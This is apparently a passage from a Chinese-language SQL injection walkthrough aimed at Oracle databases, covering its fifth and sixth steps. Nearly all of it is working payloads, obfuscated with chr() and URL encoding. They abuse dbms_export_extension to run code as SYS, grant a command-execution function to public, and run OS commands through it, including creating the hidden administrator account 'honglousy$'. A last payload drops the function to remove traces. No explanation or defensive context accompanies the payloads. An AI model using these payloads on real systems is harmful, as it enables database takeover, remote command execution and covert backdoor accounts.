 %20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(103)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(32)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(67)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(32)%7C%7Cchr(116)%7C%7Cchr(111)%7C%7Cchr(32)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(98)%7C%7Cchr(108)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1 

 =====================================================================================

第五步:

 sys.executecmd(cmd命令)  这里是ipconfig

 sys.executecmd(chr(105)%7C%7Cchr(112)%7C%7Cchr(99)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(103))=ipconfig的编码

 and 1=2 union all select chr(94)%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Csys.executecmd(chr(105)%7C%7Cchr(112)%7C%7Cchr(99)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(103))%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Cchr(94),null,null,null  from dual where 1=1 --

net user honglousy$ yanhua /add

 %20and%201=2%20union%20all%20select%20chr(94)%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Csys.executecmd(chr(110)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(117)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(104)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(108)%7C%7Cchr(111)%7C%7Cchr(117)%7C%7Cchr(115)%7C%7Cchr(121)%7C%7Cchr(36)%7C%7Cchr(32)%7C%7Cchr(121)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(104)%7C%7Cchr(117)%7C%7Cchr(97)%7C%7Cchr(32)%7C%7Cchr(47)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(100))%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Cchr(94),null,null,null%20%20from%20dual%20where%201=1%20--


net localgroup administrators honglousy$ /add

%20and%201=2%20union%20all%20select%20chr(94)%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Csys.executecmd(chr(110)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(108)%7C%7Cchr(111)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(108)%7C%7Cchr(103)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(117)%7C%7Cchr(112)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(109)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(105)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(104)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(108)%7C%7Cchr(111)%7C%7Cchr(117)%7C%7Cchr(115)%7C%7Cchr(121)%7C%7Cchr(36)%7C%7Cchr(32)%7C%7Cchr(47)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(100))%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Cchr(94),null,null,null%20%20from%20dual%20where%201=1%20--















======================================================================================

第六步:

  and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''drop function executeCmd;'';END;';END;--,SYS,0,1,0) and 1=1

   *******************************************************************************

 %20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(100)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(112)%7C%7Cchr(32)%7C%7Cchr(102)%7C%7Cchr(117)%7C%7Cchr(110)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(67)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1